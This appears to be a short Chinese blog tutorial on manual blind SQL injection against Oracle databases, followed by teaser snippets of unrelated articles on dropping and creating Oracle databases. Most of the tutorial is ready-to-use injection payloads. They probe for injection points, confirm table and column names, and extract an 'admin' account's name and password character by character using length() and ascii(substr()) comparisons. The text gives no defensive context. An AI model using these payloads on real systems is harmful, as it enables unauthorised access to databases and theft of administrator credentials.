Oracle 資料庫的簡單手動注入

2021-08-28 20:45:17 字數 1117 閱讀 6351

日常判斷注入點 and 1=1

and 1=2

爆破手段:

判斷表and (select count(*) from admin)<>0 返回正常,則有admin表,否則,無

判斷列名

and (select count(列名) forom admin) <> 0 返回正常,則有該列名,否則,無

爆管理員賬號密碼:

先判斷管理員賬戶字元長度

and (select count(*) from admin where length(name(此處是表中管理員賬戶的列名)) >= num) =1 這裡的num是猜測的數字(但是如果開發者在建表時針對使用者名稱的資料型別使用的是char而不是varchar呢)

爆使用者名稱的第乙個,第二個,第三個。。。。字元

and (select count(*) from admin where ascii(substr(name,1,1)) >=num) =1這裡的num是猜測的數字,再對照ascii表去找出對應的字元

and (select count(*) from admin where ascii(substr(name,2,1)) >=num) =1

and (select count(*) from admin where ascii(substr(name,3,1)) >=num) =1

......

依次爆出賬戶名的全部字元

判斷密碼的字元長度

and (select count(*) from admin where length(pwd(此處是表中管理員密碼的列名)) >= num) =1

爆密碼的第乙個,第二個,第三個。。。。字元

and (select count(*) from admin where ascii(substr(pwd,1,1)) >=num) =1

and (select count(*) from admin where ascii(substr(pwd,2,1)) >=num) =1

and (select count(*) from admin where ascii(substr(pwd,3,1)) >=num) =1

......

依次爆出密碼的全部字元

oracle手動刪除資料庫

特權使用者可以使用 drop database 方式刪除資料庫,但此時的資料庫必須處於 mount 狀態,並且一 restrict 方式裝載資料庫。1 在命令提示符下以具有 sysdba 身份的使用者進行登陸。sqlplus sys pwd as sysdba 2 通過資料字典視 global na...

手動建立oracle資料庫例項

1 首先設定 oracle sid manual 2 建立密碼檔案 oracle myorcl dbs orapwd file orapmanual password oracle 3 建立所需的目錄結構 oracle myorcl admin mkdir manual 然後進入manual目錄建立...

手動刪除資料庫 oracle

手動刪 除oracle資料 庫 在很多情況下,或無法使用dbca工具的時候,我們需要手動來刪除資料庫。對此,可以借助drop database命令來實現,下面的描述中給出手動刪除資料庫 的具體步驟,包含檔案系統資料庫以及asm資料庫。環境 oracle enterprise linux 5.4 or...